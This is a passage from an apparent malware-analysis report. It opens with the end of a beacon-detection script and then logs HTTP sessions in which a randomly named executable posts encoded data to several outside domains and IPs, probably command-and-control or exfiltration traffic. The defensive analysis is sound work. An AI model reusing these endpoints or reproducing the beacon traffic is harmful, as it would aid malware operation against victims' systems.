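    for addrs, names in shared_hosting(ANSWERS).items():
        print(sorted(addrs), "->", names)
```

Run against the rows above, the mean gap comes out near 14 seconds with a coefficient of variation well under 0.1, so the lookups are timer-driven rather than user-driven, and four of the names collapse onto the same two addresses. A detector fed from passive DNS or resolver logs would key the same statistics on (client, time window) and alert when `is_rotating_beacon` fires.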
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49911 | 154.92.61.37 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:39:42.510540962 CET | 549 | OUT | GET /hv6g/?SvrLY=3P8lALA&DDp=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q= HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.huiguang.xyz
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 6, 2024 08:39:43.444372892 CET | 835 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:39:43 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 609
                                                                                                        Last-Modified: Sat, 02 Nov 2024 05:16:45 GMT
                                                                                                        Connection: close
                                                                                                        ETag: "6725b5bd-261"
                                                                                                        Accept-Ranges: bytes
                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e5 ae 89 e5 85 a8 e8 bf 9b e5 85 a5 2e 2e 2e 2e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 61 31 63 38 63 66 38 63 65 35 31 33 34 33 34 34 34 65 37 38 32 33 66 62 39 35 65 66 65 33 38 65 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 [TRUNCATED]
Data Ascii: <!doctype html><html><head> <title>.......</title> <meta charset="utf-8"><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?a1c8cf8ce51343444e7823fb95efe38e"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script></head><body><script> window.onload = function() { setTimeout(function() { window.location.href = 'https://34.92.79.175:19817/register'; }, 1000); // 1 }; </script></body></html>
The title bytes e6 ad a3 e5 9c a8 e5 ae 89 e5 85 a8 e8 bf 9b e5 85 a5 in the raw dump are UTF-8 for 正在安全进入 ("entering securely"), which the ASCII rendering above shows as dots; the page loads a Baidu analytics tag and, after 1000 ms, redirects the browser to https://34.92.79.175:19817/register.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49983 | 3.33.130.190 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:39:58.887490034 CET | 831 | OUT | POST /79tr/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.beingandbecoming.ltd
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.beingandbecoming.ltd
                                                                                                        Referer: http://www.beingandbecoming.ltd/79tr/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 35 2b 47 59 36 57 75 36 70 72 6d 2b 68 64 4b 79 4d 36 47 5a 72 64 34 38 62 72 4a 52 41 78 32 38 45 66 35 42 43 54 77 68 37 47 7a
                                                                                                        Data Ascii: DDp=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgW5+GY6Wu6prm+hdKyM6GZrd48brJRAx28Ef5BCTwh7Gz


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49984 | 3.33.130.190 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:01.441909075 CET | 855 | OUT | POST /79tr/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.beingandbecoming.ltd
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.beingandbecoming.ltd
                                                                                                        Referer: http://www.beingandbecoming.ltd/79tr/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 36 66 76 4a 70 79 57 72 38 48 79 31 68 6f 35 43 64 64 34 38 49 75 64 4c 46 59 75 55 77 54 69 38 44 55 65 57 5a 51 62 73 70 4b 7a 42 39 4a 43 69 4a 76 56 49 44 50 42 6b 32 63 4d 37 33 32 34 65 4d 52 37 4f 36 37 69 31 5a 4f 56 58 63 49 66 4d 2f 36 6f 38 34 75 6c 41 34 43 4f 6e 41 4b 30 48 4e 79 51 4b 41 63 2b 49 49 65 57 79 52 54 49 4f 42 4e 47 6d 6f 4f 55 50 6a 44 53 61 57 33 75 75 71 42 2f 58 41 51 75 2f 36 6c 4c 37 39 36 38 5a 7a 37 52 67 78 63 2b 45 6e 35 54 56 66 58 75 50 6a 51 41 41 6d 52 49 77 6d 72 41 76 33 2b 39 65 43 72 56 46 33 50 39 51 3d 3d
                                                                                                        Data Ascii: DDp=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbS6fvJpyWr8Hy1ho5Cdd48IudLFYuUwTi8DUeWZQbspKzB9JCiJvVIDPBk2cM7324eMR7O67i1ZOVXcIfM/6o84ulA4COnAK0HNyQKAc+IIeWyRTIOBNGmoOUPjDSaW3uuqB/XAQu/6lL7968Zz7Rgxc+En5TVfXuPjQAAmRIwmrAv3+9eCrVF3P9Q==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49985 | 3.33.130.190 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:03.983037949 CET | 1868 | OUT | POST /79tr/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.beingandbecoming.ltd
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.beingandbecoming.ltd
                                                                                                        Referer: http://www.beingandbecoming.ltd/79tr/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 43 66 75 2b 42 79 5a 73 41 48 7a 31 68 6f 36 43 64 63 34 38 49 4a 64 4c 39 63 75 55 73 44 69 2b 4c 55 66 30 52 51 50 4a 46 4b 6b 52 39 4a 4f 43 4a 75 4b 59 43 4e 42 6b 6d 69 4d 37 6e 32 34 65 4d 52 37 4d 53 37 72 47 42 4f 47 6e 63 50 4c 63 2f 32 73 38 35 35 6c 44 4a 33 4f 6e 30 77 30 7a 35 79 51 71 51 63 38 64 55 65 4f 69 52 52 45 75 41 51 47 6d 6b 4e 55 4c 44 6c 53 5a 4b 4a 75 70 71 42 7a 67 52 7a 71 37 71 76 61 36 6c 59 71 4c 33 45 49 32 42 37 7a 6a 4c 2b 66 44 71 6c 70 38 33 72 4f 58 6d 63 49 52 58 54 50 50 2f 4f 2f 72 6e 4d 65 31 33 4c 68 32 74 32 47 74 5a 63 61 70 4d 56 35 7a 30 73 49 6a 63 53 30 6e 45 44 34 53 6b 59 63 49 48 45 38 65 59 48 4a 38 51 4b 72 45 55 5a 38 4b 32 61 58 4d 63 34 48 79 6b 69 38 4d 74 48 73 79 71 70 2b 6b 73 59 4f 44 52 2b 43 56 47 67 75 36 75 48 57 6d 4c 69 36 5a 71 41 69 2f 56 69 48 2f 73 66 73 33 2b 78 70 41 34 6a 43 50 69 4f 72 2f [TRUNCATED]
Data Ascii: DDp=[…] [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49986 | 3.33.130.190 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:06.531075954 CET | 557 | OUT | GET /79tr/?DDp=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&SvrLY=3P8lALA HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.beingandbecoming.ltd
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 6, 2024 08:40:07.141361952 CET | 409 | IN | HTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Wed, 06 Nov 2024 07:40:07 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 269
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 44 70 3d 76 42 34 30 31 36 72 77 66 48 30 4d 78 74 61 77 4c 33 7a 47 59 47 61 58 59 73 49 68 38 69 50 6e 65 38 75 68 2b 6d 6e 6f 48 52 65 57 6c 6f 4e 6d 4d 37 64 70 34 46 67 72 36 77 74 4b 37 50 74 63 57 74 4e 76 73 45 30 43 70 74 33 74 51 57 74 56 51 72 5a 50 79 67 73 2b 4d 78 49 4d 55 4e 48 32 61 6b 43 66 4e 37 2f 43 7a 70 73 5a 79 4c 6a 36 71 6d 4a 31 46 31 55 75 44 4e 62 64 71 76 55 69 70 44 45 69 54 67 55 3d 26 53 76 72 4c 59 3d 33 50 38 6c 41 4c 41 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?DDp=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&SvrLY=3P8lALA"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49987 | 203.161.49.193 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:12.301387072 CET | 822 | OUT | POST /hxmz/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.futurevision.life
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.futurevision.life
                                                                                                        Referer: http://www.futurevision.life/hxmz/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 45 72 38 6d 38 70 61 42 53 33 46 2f 62 66 6c 69 34 63 2f 4b 72 41 75 39 66 72 51 63 42 70 71 4c 5a 56 4b 58 6d 46 6b 73 57 42 6a 45 42 7a 49 73 7a 2f 52 67 71 47 6c 36 76 6e 4f 77 65 48 33 49 4e 45 45 4d 5a 45 72 63 75 64 51 72 64 4e 72 39 35 53 69 4c 78 43 34 73 58 6b 65 6c 64 51 6f 46 34 38 39 2f 58 6f 54 63 70 79 42 4d 76 61 43 64 51 56 35 4d 6e 72 48 4d 62 6f 47 61 67 73 55 6f 61 39 35 37 53 39 48 65 70 76 52 74 63 68 73 79 51 56 4e 4c 52 46 35 35 34 6b 43 70 47 44 76 6b 69 58 50 45 34 38 74 65 61 53 4d 65 6b 78 4e 4d 67 74 4d 54 47 71 6b 68 4b 6a 57 4f 2b 59 7a 4b
                                                                                                        Data Ascii: DDp=8cwN9mJXk9DUEr8m8paBS3F/bfli4c/KrAu9frQcBpqLZVKXmFksWBjEBzIsz/RgqGl6vnOweH3INEEMZErcudQrdNr95SiLxC4sXkeldQoF489/XoTcpyBMvaCdQV5MnrHMboGagsUoa957S9HepvRtchsyQVNLRF554kCpGDvkiXPE48teaSMekxNMgtMTGqkhKjWO+YzK
Nov 6, 2024 08:40:12.982852936 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Wed, 06 Nov 2024 07:40:12 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49988 | 203.161.49.193 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:14.842593908 CET | 846 | OUT | POST /hxmz/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.futurevision.life
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 232
Cache-Control: no-cache
Origin: http://www.futurevision.life
Referer: http://www.futurevision.life/hxmz/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 57 2f 41 6d 76 34 61 42 61 33 46 38 65 66 6c 69 32 38 2f 4f 72 41 69 39 66 71 55 79 42 2f 36 4c 65 78 61 58 6e 45 6b 73 52 42 6a 45 4b 54 49 70 33 2f 52 76 71 47 70 79 76 6b 57 77 65 48 6a 49 4e 41 55 4d 59 7a 2f 66 38 64 51 70 57 74 72 2f 32 79 69 4c 78 43 34 73 58 6b 61 50 64 51 77 46 37 4e 4e 2f 56 4a 54 64 6b 53 42 54 6f 61 43 64 42 46 34 4c 6e 72 48 4c 62 74 65 30 67 71 59 6f 61 34 64 37 54 6f 7a 66 6a 76 52 6a 54 42 74 32 44 57 6f 31 4a 57 49 5a 79 53 65 50 54 77 58 37 71 42 53 65 6b 50 74 39 49 43 73 63 6b 7a 56 2b 67 4e 4d 35 45 71 63 68 59 30 61 70 78 73 57 70 65 46 44 59 4f 4e 71 74 71 2f 65 66 6d 32 49 45 4a 6a 65 70 34 51 3d 3d
                                                                                                        Data Ascii: DDp=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/6LexaXnEksRBjEKTIp3/RvqGpyvkWweHjINAUMYz/f8dQpWtr/2yiLxC4sXkaPdQwF7NN/VJTdkSBToaCdBF4LnrHLbte0gqYoa4d7TozfjvRjTBt2DWo1JWIZySePTwX7qBSekPt9ICsckzV+gNM5EqchY0apxsWpeFDYONqtq/efm2IEJjep4Q==
Nov 6, 2024 08:40:15.511419058 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Wed, 06 Nov 2024 07:40:15 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49989 | 203.161.49.193 | 80 | 4156 | C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 08:40:17.389429092 CET | 1859 | OUT | POST /hxmz/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.futurevision.life
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1244
Cache-Control: no-cache
Origin: http://www.futurevision.life
Referer: http://www.futurevision.life/hxmz/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 57 2f 41 6d 76 34 61 42 61 33 46 38 65 66 6c 69 32 38 2f 4f 72 41 69 39 66 71 55 79 42 2f 79 4c 65 47 79 58 6d 6a 34 73 51 42 6a 45 4a 54 49 6f 33 2f 52 32 71 47 68 32 76 6a 65 47 65 42 76 49 4e 69 63 4d 66 47 44 66 32 64 51 70 4c 39 72 2b 35 53 69 65 78 43 6f 67 58 6b 4b 50 64 51 77 46 37 4f 56 2f 53 59 54 64 6d 53 42 4d 76 61 43 76 51 56 34 76 6e 76 72 39 62 74 54 42 67 61 34 6f 61 65 39 37 65 2b 66 66 76 76 52 32 51 42 74 51 44 57 55 51 4a 57 55 6a 79 53 43 78 54 7a 4c 37 70 6b 4b 49 77 62 5a 6d 64 6a 68 77 77 41 55 55 6a 34 49 6f 41 71 67 69 58 56 75 65 31 4f 4c 4b 5a 46 7a 55 46 62 33 33 6f 4f 4f 47 68 47 31 71 4d 7a 62 58 71 5a 33 43 57 63 42 48 49 6b 75 6e 73 6e 66 6e 62 5a 78 52 6a 4f 59 67 68 6d 6e 33 50 70 35 51 38 6e 45 4a 6d 45 4a 41 59 30 4e 45 74 79 6b 30 31 52 4a 2f 32 6f 48 49 2f 72 39 63 45 64 37 4c 4e 71 55 74 38 6a 67 59 6e 33 67 6f 4e 74 38 4e 6b 42 39 77 50 32 41 48 4e 2b 30 4e 57 6c 4d 70 52 38 73 77 7a 57 6a 76 67 32 4d 6d 4c 43 [TRUNCATED]
                                                                                                        Data Ascii: DDp=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 [TRUNCATED]
Nov 6, 2024 08:40:18.071787119 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Wed, 06 Nov 2024 07:40:17 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 